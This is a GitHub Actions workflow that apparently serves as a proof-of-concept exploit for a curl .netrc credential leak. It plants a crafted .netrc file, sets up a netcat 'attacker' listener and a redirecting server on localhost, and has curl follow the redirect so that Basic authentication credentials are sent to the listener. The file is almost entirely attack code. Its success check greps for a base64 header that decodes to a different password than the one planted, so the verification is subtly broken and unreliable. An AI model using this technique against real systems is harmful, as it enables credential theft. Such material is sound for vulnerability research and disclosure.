name: Curl Netrc Leak PoC

on:
  workflow_dispatch:

jobs:
  leak-demo:
    runs-on: ubuntu-latest
    steps:
      - name: Create malicious .netrc file
        run: |
          cat <<EOF > .netrc_poc
          machine localhost
          login admin
          password SuperSecretCiKey123

          macdef exploit_trigger

          default
          login not_admin
          EOF

      - name: Run servers and trigger the exploit
        run: |
          # 1. Start Attacker server in the background, save output to a log file
          nc -l -p 9000 > attacker.log &
          
          # 2. Start Victim server (redirector) in the background
          echo -e "HTTP/1.1 301 Moved Permanently\nLocation: http://localhost:9000" | nc -l -p 8000 -q 1 &
          
          # Give servers a moment to start
          sleep 2
          
          # 3. Trigger the exploit
          echo "--- Triggering curl against localhost:8000 ---"
          curl -v -L --netrc-file .netrc_poc http://localhost:8000
          
          # 4. Show the results
          echo "--- Content of attacker.log ---"
          cat attacker.log
          
          # 5. Check if the leak happened
          if grep -q "Authorization: Basic YWRtaW46U3VwZXJTZWNyZXRQYXNzd29yZDEyMw==" attacker.log; then
            echo "SUCCESS: Credentials successfully leaked!"
            exit 0
          else
            echo "FAILURE: Credentials not found in log."
            exit 1
          fi
